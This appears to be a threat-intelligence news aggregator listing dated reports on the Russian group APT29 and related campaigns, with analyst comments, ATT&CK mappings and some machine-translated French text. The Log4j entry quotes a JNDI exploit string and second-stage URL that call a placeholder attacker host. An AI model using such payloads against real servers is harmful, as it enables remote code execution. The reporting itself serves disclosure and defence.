What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2022-07-19 21:03:48 | Russian Hackers Using DropBox and Google Drive to Drop Malicious Payloads (lien direct) | The Russian state-sponsored hacking collective known as APT29 has been attributed to a new phishing campaign that takes advantage of legitimate cloud services like Google Drive and Dropbox to deliver malicious payloads on compromised systems. "These campaigns are believed to have targeted several Western diplomatic missions between May and June 2022," Palo Alto Networks Unit 42 said in a Tuesday | APT 29 | ||
 |
2022-07-19 13:41:49 | Russia-linked APT29 relies on Google Drive, Dropbox to evade detection (lien direct) | >Russia-linked threat actors APT29 are using the Google Drive cloud storage service to evade detection. Palo Alto Networks researchers reported that the Russia-linked APT29 group, tracked by the researchers as Cloaked Ursa, started using the Google Drive cloud storage service to evade detection. The Russia-linked APT29 group (aka SVR, Cozy Bear, and The Dukes) has been active since at least […] | Threat | APT 29 | |
 |
2022-07-19 11:00:58 | Les pirates russes APT29 utilisent les services de stockage en ligne, DropBox et Google Drive (lien direct) | Dans le monde entier, des entreprises font confiance à des services de stockage tels que DropBox et Google Drive pour leurs opérations quotidiennes. Cette confiance est pourtant mise à mal par des acteurs malveillants qui, comme le montrent les dernières recherches, de l'Unit 42 (cabinet de conseil, unité de recherches et d'analyses sur les menaces cyber de Palo Alto Networks) redoublent d'ingéniosité pour exploiter la situation au profit d'attaques extrêmement difficiles à détecter et à prévenir. (...) - Malwares | APT 29 | ||
 |
2022-07-19 10:00:00 | Russian hacking unit Cozy Bear adds Google Drive to its arsenal, researchers say (lien direct) | >APT29, one of the SVR's most active and successful hacking groups, has been using the cloud service to help deliver malware, the researchers said. | APT 29 | ||
 |
2022-07-11 22:59:00 | Anomali Cyber Watch: Brute Ratel C4 Framework Abused to Avoid Detection, OrBit Kernel Malware Patches Linux Loader, Hive Ransomware Gets Rewritten, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, China, Cyberespionage, India, Malspam, Ransomware, Russia, Spearhishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Targets of Interest | Russian Organizations Increasingly Under Attack By Chinese APTs
(published: July 7, 2022)
SentinelLabs researchers detected yet another China-sponsored threat group targeting Russia with a cyberespionage campaign. The attacks start with a spearphishing email containing Microsoft Office maldocs built with the Royal Road malicious document builder. These maldocs were dropping the Bisonal backdoor remote access trojan (RAT). Besides targeted Russian organizations, the same attackers continue targeting other countries such as Pakistan. This China-sponsored activity is attributed with medium confidence to Tonto Team (CactusPete, Earth Akhlut).
Analyst Comment: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from advanced persistent threats (APTs), including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Exploitation for Client Execution - T1203
Tags: China, source-country:CN, Russia, target-country:RU, Ukraine, Pakistan, target-country:PK, Bisonal RAT, Tonto Team, APT, CactusPete, Earth Akhlut, Royal Road, 8.t builder, CVE-2018-0798
OrBit: New Undetected Linux Threat Uses Unique Hijack of Execution Flow
(published: July 6, 2022)
Intezer researchers describe a new Linux malware dubbed OrBit, that was fully undetected at the time of the discovery. This malware hooks functions and adds itself to all running processes, but it doesn’t use LD_PRELOAD as previously described Linux threats. Instead it achieves persistence by adding the path to the malware into the /etc/ld.so.preload and by patching the binary of the loader itself so it will load the malicious shared object. OrBit establishes an SSH connection, then stages and infiltrates stolen credentials. It avoids detection by multiple functions that show running processes or network connections, as it hooks these functions and filters their output.
Analyst Comment: Defenders are advised to use network telemetry to detect anomalous SSH traffic associated with OrBit exfiltration attempts. Consider network segmentation, storing sensitive data offline, and deploying security solutions as statically linked executables.
MITRE ATT&CK: [MITRE ATT&CK] Hijack Execution Flow - T1574 | [MITRE ATT&CK] Hide Artifacts - T1564 | |
Ransomware Malware Tool Vulnerability Threat Patching | APT 29 | |
 |
2022-07-06 05:27:10 | Near-undetectable malware linked to Russia\'s Cozy Bear (lien direct) | The fun folk who attacked Solar Winds using a poisoned CV and tools from the murky world of commercial hackware Palo Alto Networks' Unit 42 threat intelligence team has claimed that a piece of malware that 56 antivirus products were unable to detect is evidence that state-backed attackers have found new ways to go about the evil business.… | Malware Tool Threat | APT 29 | |
|
2022-05-10 17:08:00 | Anomali Cyber Watch: Moshen Dragon Abused Anti-Virus Software, Raspberry Robin Worm Jumps from USB, UNC3524 Uses Internet-of-Things to Steal Emails, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cyberespionage, Phishing, Ransomware, Sideloading, and Ukraine. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Attackers Are Attempting to Exploit Critical F5 BIG-IP RCE
(published: May 9, 2022)
CVE-2022-1388, a critical remote code execution vulnerability affecting F5 BIG-IP multi-purpose networking devices/modules, was made public on May 4, 2022. It is of high severity (CVSSv3 score is 9.8). By May 6, 2022, multiple researchers have developed proof-of concept (PoC) exploits for CVE-2022-1388. The first in-the-wild exploitation attempts were reported on May 8, 2022.
Analyst Comment: Update your vulnerable F5 BIG-IP versions 13.x and higher. BIG-IP 11.x and 12.x will not be fixed, but temporary mitigations available: block iControl REST access through the self IP address and through the management interface, modify the BIG-IP httpd configuration.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190
Tags: CVE-2022-1388, F5, Vulnerability, Remote code execution, Missing authentication
Mobile Subscription Trojans and Their Little Tricks
(published: May 6, 2022)
Kaspersky researchers analyzed five Android trojans that are secretly subscribing users to paid services. Jocker trojan operators add malicious code to legitimate apps and re-upload them to Google Store under different names. To avoid detection, malicious functionality won’t start until the trojan checks that it is available in the store. The malicious payload is split in up to four files. It can block or substitute anti-fraud scripts, and modify X-Requested-With header in an HTTP request. Another Android malware involved in subscription fraud, MobOk trojan, has additional functionality to bypass captcha. MobOk was seen in a malicious app in Google Store, but the most common infection vector is being spread by other Trojans such as Triada.
Analyst Comment: Limit your apps to downloads from the official stores (Google Store for Android), avoid new apps with low number of downloads and bad reviews. Pay attention to the terms of use and payment. Avoid granting it too many permissions if those are not crucial to the app alleged function. Monitor your balance and subscription list.
MITRE ATT&CK: [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Data Manipulation - T1565
Tags: Android, Jocker, MobOk, Triada, Vesub, GriftHorse, Trojan, Subscription fraud, Subscription Trojan, Russia, target-country:RU, Middle East, Saudi Arabia, target-country:SA, Egypt, target-country:EG, Thailand, target-country:TH
Raspberry Robin Gets the Worm Early
(published: May 5, 2022)
Since September 2021, Red Canary researchers monitor Raspberry Robin, a new worm |
Ransomware Malware Tool Vulnerability Threat | APT 29 APT 28 | ★★★ |
 |
2022-05-05 13:08:59 | Cozy Bear Goes Typosquatting (lien direct) |
Researchers at Recorded Future's Insikt Group warn that the Russian threat actor NOBELIUM (also known as APT29 or Cozy Bear) is using typosquatting domains to target the news and media industries with phishing pages. |
Threat | APT 29 | |
 |
2022-05-03 15:43:28 | Russian hacker group APT29 targeting diplomats (lien direct) | The state-supported group behind the SolarWinds supply chain attack is going after diplomats using spear phishing to deploy a novel strain of malware. | APT 29 | ||
 |
2022-05-03 10:08:45 | Russian Cyberspies Target Diplomats With New Malware (lien direct) | Russian cyberespionage group APT29 has been observed using new malware and techniques in phishing campaigns targeting diplomatic organizations in Europe, the Americas, and Asia, Mandiant reports. | Malware | APT 29 | |
 |
2022-05-02 09:30:00 | UNC3524: Eye Spy sur votre e-mail UNC3524: Eye Spy on Your Email (lien direct) |
Mise à jour (novembre 2022): Nous avons fusionné UNC3524 avec APT29. L'activité UNC3524 décrite dans ce post est désormais attribuée à APT29.
Depuis décembre 2019, Mandiant a observé que les acteurs avancés des menaces augmentent leur investissement dans des outils pour faciliter la collecte de courriels en vrac dans les environnements de victime, en particulier en ce qui concerne leur soutien aux objectifs d'espionnage présumés.Les e-mails et leurs pièces jointes offrent une riche source d'informations sur une organisation, stockée dans un emplacement centralisé pour les acteurs de menace à collecter.La plupart des systèmes de messagerie, qu'ils soient sur site ou dans le cloud, offrent
UPDATE (November 2022): We have merged UNC3524 with APT29. The UNC3524 activity described in this post is now attributed to APT29. Since December 2019, Mandiant has observed advanced threat actors increase their investment in tools to facilitate bulk email collection from victim environments, especially as it relates to their support of suspected espionage objectives. Email messages and their attachments offer a rich source of information about an organization, stored in a centralized location for threat actors to collect. Most email systems, whether on-premises or in the cloud, offer |
Tool Threat | APT 29 | ★★ |
|
2022-05-02 05:34:39 | Russia-linked APT29 targets diplomatic and government organizations (lien direct) | Russia-linked APT29 (Cozy Bear or Nobelium) launched a spear-phishing campaign targeting diplomats and government entities. In mid-January 2022, security researchers from Mandiant have spotted a spear-phishing campaign, launched by the Russia-linked APT29 group, on targeting diplomats and government entities. The Russia-linked APT29 group (aka SVR, Cozy Bear, and The Dukes) has been active since at least 2014, […] | APT 29 | ||
|
2022-05-02 04:40:01 | Russian Hackers Targeting Diplomatic Entities in Europe, Americas, and Asia (lien direct) | A Russian state-sponsored threat actor has been observed targeting diplomatic and government entities as part of a series of phishing campaigns commencing on January 17, 2022. Threat intelligence and incident response firm Mandiant attributed the attacks to a hacking group tracked as APT29 (aka Cozy Bear), with some set of the activities associated with the crew assigned the moniker Nobelium ( | Threat | APT 29 | |
|
2022-04-28 12:00:00 | Trello de l'autre côté: suivi des campagnes de phishing APT29 Trello From the Other Side: Tracking APT29 Phishing Campaigns (lien direct) |
Depuis le début de 2021, Mandiant suit les vastes campagnes de phishing APT29 ciblant les organisations diplomatiques en Europe, les Amériques et l'Asie.Ce billet de blog traite de nos récentes observations liées à l'identification de deux nouvelles familles de logiciels malveillants en 2022, Beatdrop et Boommic, ainsi que les efforts d'APT29 \\ pour échapper à la détection par réorganisation et abus du service Trello d'Atlassian \\.
apt29 est un groupe d'espionnage russe que Mandiant suit depuis au moins 2014 et est probablement Parrainé par le Foreign Intelligence Service (SVR).Le ciblage diplomatique centré sur ce récent
Since early 2021, Mandiant has been tracking extensive APT29 phishing campaigns targeting diplomatic organizations in Europe, the Americas, and Asia. This blog post discusses our recent observations related to the identification of two new malware families in 2022, BEATDROP and BOOMMIC, as well as APT29\'s efforts to evade detection through retooling and abuse of Atlassian\'s Trello service. APT29 is a Russian espionage group that Mandiant has been tracking since at least 2014 and is likely sponsored by the Foreign Intelligence Service (SVR). The diplomatic-centric targeting of this recent |
Malware | APT 29 APT 29 | ★★★★ |
|
2022-04-27 09:00:00 | Assemblage de la poupée de nidification russe: UNC2452 a fusionné dans APT29 Assembling the Russian Nesting Doll: UNC2452 Merged into APT29 (lien direct) |
Mandiant a recueilli des preuves suffisantes pour évaluer que l'activité a suivi comme unc2452, le nom de groupe utilisé pour suivre le Solarwinds Compromis en décembre 2020 , est attribuable à APT29. Cette conclusion correspond aux instructions d'attribution précédemment faites par le u.s.Gouvernement que le compromis de la chaîne d'approvisionnement de Solarwinds a été réalisé par APT29, un groupe d'espionnage basé en Russie évalué comme parrainé par le Russian Foreign Intelligence Service (SVR).Notre évaluation est basée sur des données de première main recueillies par Mandiant et est le résultat d'une comparaison et d'une revue approfondies de UNC2452 et de notre | Solardwinds APT 29 APT 29 | ★★★ | |
|
2022-04-18 12:42:15 | “Being Annoying” as a Social Engineering Approach (lien direct) |
Attackers are spamming multifactor authentication (MFA) prompts in an attempt to irritate users into approving the login, Ars Technica reports. Both criminal and nation-state actors are using this technique. Researchers at Mandiant observed the Russian state-sponsored actor Cozy Bear launching repeated MFA prompts until the user accepted the request. |
APT 29 APT 29 | ||
 |
2022-04-01 11:12:27 | Bypassing Two-Factor Authentication (lien direct) | These techniques are not new, but they’re increasingly popular: …some forms of MFA are stronger than others, and recent events show that these weaker forms aren’t much of a hurdle for some hackers to clear. In the past few months, suspected script kiddies like the Lapsus$ data extortion gang and elite Russian-state threat actors (like Cozy Bear, the group behind the SolarWinds hack) have both successfully defeated the protection. […] Methods include: Sending a bunch of MFA requests and hoping the target finally accepts one to make the noise stop. ... | Threat | APT 29 | |
 |
2022-03-19 10:45:49 | Leaked ransomware documents show Conti helping Putin from the shadows (lien direct) | Hacker gang sometimes acts in Russia's interest, with ad hoc links to FSB, Cozy Bear. | Ransomware | APT 29 | |
 |
2022-03-15 13:20:59 | (Déjà vu) Additional Wiper Malware Deployed in Ukraine #CaddyWiper (lien direct) | FortiGuard Labs is aware of new wiper malware observed in the wild attacking Ukrainian interests. The wiper was found by security researchers today at ESET. The wiper is dubbed CaddyWiper. Preliminary analysis reveals that the wiper malware erases user data and partition information from attached drives. According to the tweet, CaddyWiper does not share any code with HermeticWiper or IsaacWiper or any known malware families.This is a breaking news event. More information will be added when relevant updates are available.For further reference about Ukrainian wiper attacks please reference our Threat Signal from January and February. Also, please refer to our recent blog that encompasses the recent escalation in Ukraine, along with salient advice about patch management and why it is important, especially in today's political climate.Is this the Work of Nobelium/APT29?At this time, there is not enough information to correlate this to Nobelium/APT29 or nation state activity. Was this Sample Signed?No. Unlike the HermeticWiper sample related to Ukrainian attacks, this sample is unsigned.Why is Malware Signed?Malware is often signed by threat actors as a pretense to evade AV or any other security software. Signed malware allows threat actors to evade and effectively bypass detection, guaranteeing a higher success rate. What is the Status of Coverage?FortiGuard Labs has AV coverage in place for publicly available samples as:W32/CaddyWiper.NCX!tr | Malware Threat | APT 29 | |
|
2022-02-25 00:05:00 | Anomali Threat Research Provides Russian Cyber Activity Dashboard (lien direct) | Russian government-sponsored threat actors recently increased their malicious activities[1], which are aligned with Russia’s attack on Ukraine in February 2022.
Russian retaliation for ongoing economic and diplomatic sanctions imposed by many other countries poses a significant risk of further escalation in the cyber sphere. Russian government-sponsored groups are dangerous cyber-actors that are well-resourced and relentless in their attacks, which include espionage, attacks on critical infrastructure, data destruction, and other malicious activities.
To assist our customers, Anomali has released a dashboard focused on Russian-origin actors and Russian cyber activity for ThreatStream users, titled “Russian Cyber Activity.”
The Anomali Threat Research team preconfigured this custom dashboard to provide immediate access and visibility into all known Russian government-related indicators of compromise (IOCs) made available through commercial and open-source threat feeds that users manage on Anomali ThreatStream.
Russian Cyber Activity is focused on seven threat actor groups: Six groups are well-known Russian advanced persistent threat (APT) groups: Berserk Bear, Cozy Bear (APT29), Fancy Bear (APT28), Gamaredon (Primitive Bear), Turla (Venomous Bear), and Voodoo Bear (Sandworm).
Additionally, we’ve included Evil Corp (Dridex, Indrik Spider) group. Although typically financially motivated, its leader is known to work for Russia’s Federal Security Services (FSB) and has conducted cyber operations on behalf of the Russian government.[2]
Anomali customers using ThreatStream, Match, and Lens are able to immediately detect any IOCs present in their environments and quickly consume threat bulletins containing machine-readable IOCs. This enables analysts to quickly operationalize threat intelligence across their security infrastructures, as well as communicate to all stakeholders if and how they have been impacted.
Anomali recently added thematic dashboards that respond to significant global events as part of ongoing product enhancements that further automate and speed essential tasks performed by threat intelligence and security operations analysts. In addition to Russian Cyber Activity, ThreatStream customers currently have access to multiple dashboards announced as part of our recent quarterly product release.
Customers can easily integrate the Russian Cyber Activity dashboard, among others, in the “+ Add Dashboard” tab in the ThreatStream console:
Endnotes
[1] “Attack on Ukrainian Government Websites Linked to GRU Hackers,” Bellingcat Investigation Team, accessed February 24, 2022, published February 23, 2022, https://www.bellingcat.com/news/2022/02/23/attack-on-ukrainian-government-websites-linked-to-russian-gru-hackers/; Joe Tidy “Ukraine crisis: 'Wiper' discovered in latest cyber-attacks,” BBC News, accessed February 24, 2022, published February 24, 2022, https://www.bbc.com/news/technology-60500618.
[2] “Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware,” The U.S. Department of the Treasury, accessed February 24, 2022, published December 5, 2019, https://home.treasury.gov/news/press-releases/sm845. |
Threat Guideline | APT 29 APT 29 APT 28 | |
|
2022-02-23 18:34:00 | New Wiper Malware Discovered Targeting Ukrainian Interests (lien direct) | FortiGuard Labs is aware of new wiper malware observed in the wild attacking Ukrainian interests. The wiper was found by security researchers today at ESET. Various estimates from both outfits reveal that the malware wiper has been installed on several hundreds of machines within the Ukraine. Cursory analysis reveals that wiper malware contains a valid signed certificate that belongs to an entity called "Hermetica Digital" based in Cyprus. This is a breaking news event. More information will be added when relevant updates are available. For further reference about Ukrainian wiper attacks please reference our Threat Signal from January. Also, please refer to our most recent blog that encompasses the recent escalation in Ukraine, along with salient advice about patch management and why it is important, especially in today's political climate. Is this the Work of Nobelium/APT29?At this time, there is not enough information to correlate this to Nobelium/APT29 or nation state activity. Are there Other Samples Observed Using the Same Certificate?No. Cursory analysis at this time highlights that the Hermetica Digital certificate used by this malware sample is the only one that we are aware of at this time. Was the Certificate Stolen?Unknown at this time. As this is a breaking news event, information is sparse. Why is the Malware Signed?Malware is often signed by threat actors as a pretence to evade AV or any other security software. Signed malware allows for threat actors to evade and effectively bypass detection and guaranteeing a higher success rate. What is the Status of Coverage?FortiGuard Labs has AV coverage in place for publicly available samples as:W32/KillDisk.NCV!tr | Malware Threat | APT 29 | |
|
2022-02-09 02:46:33 | Russian APT Hackers Used COVID-19 Lures to Target European Diplomats (lien direct) | The Russia-linked threat actor known as APT29 targeted European diplomatic missions and Ministries of Foreign Affairs as part of a series of spear-phishing campaigns mounted in October and November 2021. According to ESET's T3 2021 Threat Report shared with The Hacker News, the intrusions paved the way for the deployment of Cobalt Strike Beacon on compromised systems, followed by leveraging the | Threat | APT 29 | |
|
2022-02-08 16:00:00 | Anomali Cyber Watch: Conti Ransomware Attack, Iran-Sponsored APTs, New Android RAT, Russia-Sponsored Gamaredon, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cyberespionage, Data breach, RATs, SEO poisoning, and Spearphishing. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
New CapraRAT Android Malware Targets Indian Government and Military Personnel
(published: February 7, 2022)
Trend Micro researchers have discovered a new remote access trojan (RAT) dubbed, CapraRAT, that targets Android systems. CapraRAT is attributed to the advanced persistent threat (APT) group, APT36 (Earth Karkaddan, Mythic Leopard, Transparent Tribe), which is believed to be Pakistan-based group that has been active since at least 2016. The Android-targeting CapraRAT shares similarities (capabilities, commands, and function names) to the Windows targeting Crimson RAT, and researchers note that it may be a modified version of the open source AndroRAT. The delivery method of CapraRAT is unknown, however, APT36 is known to use spearphishing emails with attachments or links. Once CapraRAT is installed and executed it will attempt to reach out to a command and control server and subsequently begin stealing various data from an infected device.
Analyst Comment: It is important to only use the Google Play Store to obtain your software (for Android users), and avoid installing software from unverified sources because it is easier for malicious applications to get into third-party stores. Applications that ask for additional permissions outside of their normal functionality should be treated with suspicion, and normal functionality for the applications should be reviewed carefully prior to installation. Antivirus applications, if available, should be installed devices.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Software Deployment Tools - T1072
Tags: APT36, Earth Karkaddan, Mythic Leopard, Transparent Tribe, Android, CapraRAT
Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine
(published: February 3, 2022)
The Russia-sponsored, cyberespionage group Primitive Bear (Gamaredon) has continued updating its toolset, according to Unit 42 researchers. The group continues to use their primary tactic in spearphishing emails with attachments that leverage remote templates and template injection with a focus on Ukraine. These email attachments are usually Microsoft Word documents that use the remote template to fetch VBScript, execute it to establish persistence, and wait for the group’s instruction via a command and control server. Unit 42 researchers have analyzed the group’s activity and infrastructure dating back to 2018 up to the current border tensions between Russia and Ukraine. The infrastructure behind the campaigns is robust, with clusters of domains that are rotated and parked on different IPs, often on a daily basis.
Analyst Comment: Spearphishing emails represent a significant security risk because the sending email will often appear legitimate to the target; sometimes a target company email is compromis |
Ransomware Malware Threat Conference | APT 35 APT 35 APT 29 APT 29 APT 36 | ★★ |
 |
2022-01-27 09:23:25 | Russian APT29 hackers\' stealthy malware undetected for years (lien direct) | Hackers associated with the Russian Federation Foreign Intelligence Service (SVR) continued their incursions on networks of multiple organizations after the SolarWinds supply-chain compromise using two recently discovered sophisticated threats. [...] | Malware | APT 29 | |
 |
2022-01-27 08:00:06 | Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign (lien direct) | StellarParticle is a campaign tracked by CrowdStrike as related to the SUNSPOT implant from the SolarWinds intrusion in December 2020 and associated with COZY BEAR (aka APT29, “The Dukes”). The StellarParticle campaign has continued against multiple organizations, with COZY BEAR using novel tools and techniques to complete their objectives, as identified by CrowdStrike incident responders […] | Solardwinds Solardwinds APT 29 APT 29 | ||
|
2022-01-19 22:45:00 | Anomali Cyber Watch: Russia-Sponsored Cyber Threats, China-Based Earth Lusca Active in Cyberespionage and Cybertheft, BlueNoroff Hunts Cryptocurrency-Related Businesses, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, China, HTTP Stack, Malspam, North Korea, Phishing, Russia and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Earth Lusca Employs Sophisticated Infrastructure, Varied Tools and Techniques
(published: January 17, 2022)
The Earth Lusca threat group is part of the Winnti cluster. It is one of different Chinese groups that share aspects of their tactics, techniques, and procedures (TTPs) including the use of Winnti malware. Earth Lusca were active throughout 2021 committing both cyberespionage operations against government-connected organizations and financially-motivated intrusions targeting gambling and cryptocurrency-related sectors. For intrusion, the group tries different ways in including: spearphishing, watering hole attacks, and exploiting publicly facing servers. Cobalt Strike is one of the group’s preferred post-exploitation tools. It is followed by the use of the BioPass RAT, the Doraemon backdoor, the FunnySwitch backdoor, ShadowPad, and Winnti. The group employs two separate infrastructure clusters, first one is rented Vultr VPS servers used for command-and-control (C2), second one is compromised web servers used to scan for vulnerabilities, tunnel traffic, and Cobalt Strike C2.
Analyst Comment: Earth Lusca often relies on tried-and-true techniques that can be stopped by security best practices, such as avoiding clicking on suspicious email/website links and or reacting on random banners urging to update important public-facing applications. Don’t be tricked to download Adobe Flash update, it was discontinued at the end of December 2020. Administrators should keep their important public-facing applications (such as Microsoft Exchange and Oracle GlassFish Server) updated.
MITRE ATT&CK: [MITRE ATT&CK] Drive-by Compromise - T1189 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] System Services - T1569 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] BITS Jobs - T1197 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Create or Modify System Process - T1543 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Hijack Execution Flow |
Ransomware Malware Tool Vulnerability Threat Patching Guideline | APT 41 APT 38 APT 29 APT 28 APT 28 | |
|
2021-12-15 16:00:00 | Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache, Botnets, China, Espionage, Java, Russia, USB, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit
(published: December 10, 2021)
A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498
Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file
Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers
(published: December 8, 2021)
Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1 |
Malware Tool Vulnerability Threat Cloud | APT 37 APT 29 APT 15 APT 15 APT 25 | |
|
2021-12-07 07:54:37 | Nobelium continues to target organizations worldwide with custom malware (lien direct) | Russia-linked Nobelium APT group is using a new custom malware dubbed Ceeloader in attacks against organizations worldwide. Mandiant researchers have identified two distinct clusters of activity, tracked UNC3004 and UNC2652, that were associated with the Russia-linked Nobelium APT group (aka UNC2452). The NOBELIUM APT (APT29, Cozy Bear, and The Dukes) is the threat actor that conducted […] | Malware Threat | APT 29 | |
|
2021-12-06 22:31:02 | Nobelium APT targets French orgs, French ANSSI agency warns (lien direct) | The French cyber-security agency ANSSI said that the Russia-linked Nobelium APT group has been targeting French organizations since February 2021. The French national cybersecurity agency ANSSI (Agence Nationale de la Sécurité des Systèmes d’Information) revealed that the Russia-linked Nobelium APT group has been targeting French organizations since February 2021. The NOBELIUM APT (APT29, Cozy Bear, and […] | APT 29 | ||
|
2021-12-06 10:00:00 | Activité russe présumée ciblant le gouvernement et les entités commerciales du monde entier Suspected Russian Activity Targeting Government and Business Entities Around the Globe (lien direct) |
Mise à jour (mai 2022): Nous avons fusionné unc2452 avec apt29 .L'activité UNC2452 décrite dans ce post est désormais attribuée à APT29.
comme anniversaire d'un an de la découverte du Chaîne d'approvisionnement Solarwinds Passe de compromis, mandiant reste engagé à être engagé à être engagé à être engagé à engagerSuivre l'un des acteurs les plus difficiles que nous ayons rencontrés.Ces acteurs russes présumés pratiquent la sécurité opérationnelle de premier ordre et les métiers avancés.Cependant, ils sont faillibles et nous continuons à découvrir leur activité et à apprendre de leurs erreurs.En fin de compte, ils restent une menace adaptable et évolutive qui doit être étroitement étudiée par
UPDATE (May 2022): We have merged UNC2452 with APT29. The UNC2452 activity described in this post is now attributed to APT29. As the one-year anniversary of the discovery of the SolarWinds supply chain compromise passes, Mandiant remains committed to tracking one of the toughest actors we have encountered. These suspected Russian actors practice top-notch operational security and advanced tradecraft. However, they are fallible, and we continue to uncover their activity and learn from their mistakes. Ultimately, they remain an adaptable and evolving threat that must be closely studied by |
Threat | Solardwinds APT 29 | ★★★ |
|
2021-11-02 15:00:00 | Anomali Cyber Watch: Russian Intelligence Targets IT Providers, Malspam Abuses Squid Games, Another npm Library Compromise, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Data leak, Critical services, Money laundering, Phishing, Ransomware, and Supply-chain. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
BlackMatter: New Data Exfiltration Tool Used in Attacks
(published: November 1, 2021)
Symantec researchers have discovered a custom data exfiltration tool, dubbed Exmatter, being used by the BlackMatter ransomware group. The same group has also been responsible for the Darkside ransomware - the variant that led to the May 2021 Colonial Pipeline outage. Exmatter is compiled as a .NET executable and obfuscated. This tool is designed to steal sensitive data and upload it to an attacker-controlled server prior to deployment of the ransomware as fast as possible. The speed is achieved via multiple filtering mechanisms: directory exclusion list, filetype whitelist, excluding files under 1,024 bytes, excluding files with certain attributes, and filename string exclusion list. Exmatter is being actively developed as three newer versions were found in the wild.
Analyst Comment: Exmatter exfiltration tool by BlackMatter is following two custom data exfiltration tools linked to the LockBit ransomware operation. Attackers try to narrow down data sources to only those deemed most profitable or business-critical to speed up the whole exfiltration process. It makes it even more crucial for defenders to be prepared to quickly stop any detected exfiltration operation.
